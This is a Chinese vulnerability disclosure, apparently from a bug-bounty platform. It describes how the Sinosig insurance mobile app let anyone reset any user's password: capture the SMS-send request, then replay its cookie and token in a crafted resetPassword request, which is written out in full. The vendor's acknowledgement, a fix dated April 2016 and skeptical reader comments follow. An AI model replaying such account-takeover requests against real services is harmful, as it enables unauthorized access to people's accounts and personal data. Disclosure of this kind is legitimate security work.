阳光保险app奇葩设计漏洞重置任意用户密码（可泄漏用户敏感信息）

app上的奇葩设计

步骤：

1、找回密码

发送短信时抓包，可以看到如下请求：

http://m.sinosig.com/mobile/index/index!sendMsg?newMobile=13888888888&token=2882cb3c-4e93-47f9-a5fa-c2b6ab59df04

2、我们需要用到该请求的cookie以及response中的token，构造如下请求即可重置密码：

GET /mobile/index/index!resetPassword?newPwd=ceshi111&token=获取到的token HTTP/1.1
 Host: m.sinosig.com
 Accept-Encoding: gzip, deflate
 Cookie: 第一步中的cookie
 Connection: keep-alive
 Proxy-Connection: keep-alive
 Accept: application/json, text/javascript, */*; q=0.01
 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15
 Referer: http://m.sinosig.com/mobile/index/index!toResetPassword.action
 Accept-Language: zh-cn
 X-Requested-With: XMLHttpRequest

13888888888

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-03-24 09:25

厂商回复：

感谢提交

最新状态：

2016-04-27：已修复

2016-04-27：已修复

1. 2016-04-27 11:53 | 骑虎打狗 ( 路人 | Rank:19 漏洞数:9 | 我是中国式的 你懂得..)

   0

   2、我们需要用到该请求的cookie以及response中的token，构造如下请求即可重置密码：===提交错误的验证码返回的token也是可以的？

   1# 回复此人

2. 2016-04-30 21:30 | 无花果 ( 路人 | Rank:2 漏洞数:1 )

   0

   这是要炸了阳光保险啊

   2# 回复此人

3. 2016-05-04 11:52 | 爱捣蛋的鬼 ( 实习白帽子 | Rank:77 漏洞数:15 | 爱捣蛋的鬼)

   0

   看返回结果是系统错误，这也能修改密码成功吗

   3# 回复此人